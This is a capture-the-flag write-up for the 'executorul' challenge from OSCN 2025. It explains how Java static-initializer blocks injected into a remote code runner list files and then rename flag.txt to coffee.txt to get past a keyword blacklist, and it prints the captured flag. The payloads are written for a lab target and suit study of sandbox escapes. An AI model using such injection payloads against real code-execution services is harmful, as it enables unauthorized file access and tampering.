executorul

OSCN 2025

Info

Details

Challenge Overview

Opening the connection with nc we see this:

I analyzed main.py file and the first thing that catched my eyes was

It simply says that before anything happens, the app opens "coffee.txt" as an "aesthetic image". It's a bait that this is unrelated to the challenge :))

I discovered that payloads like these are working, and help us a bit to know where we are, what files are in the current dir, etc.:

static{System.out.println(System.getProperty("user.dir"));}

response: /app

static{for(String f:new java.io.File(".").list())System.out.println(f);}

response:

Main.java  
Main.class  
coffee.txt  
flag.txt  
.dockerignore  
main.py

But nothing revealed the flag.txt content because thetry, catch method which we need to print the flag in Java, is in the blacklist words.

So the key here is to know exactly what main.py does. It opens that file which seems to be ASCII, because coffee.txt isn't a real photo (jpg/png), but an ASCII art picture.

The correct approach was to rename flag.txt to coffee.txt, in order to overwrite it. This works because both files are ASCII Text, and we're allowed to rename files.

Payload used:

static{new java.io.File("flag.txt").renameTo(new java.io.File("coffee.txt"));}

Final Flag

OSC{260bb074254fdcf2ab77a4b09339fbdb60c451161edaf46e6df60e0f342730cb}

made by k0d

Previouszodiac Next~ quiz questions

Last updated 10 months ago

hashtagChallenge Overview

hashtagFinal Flag

Challenge Overview

Final Flag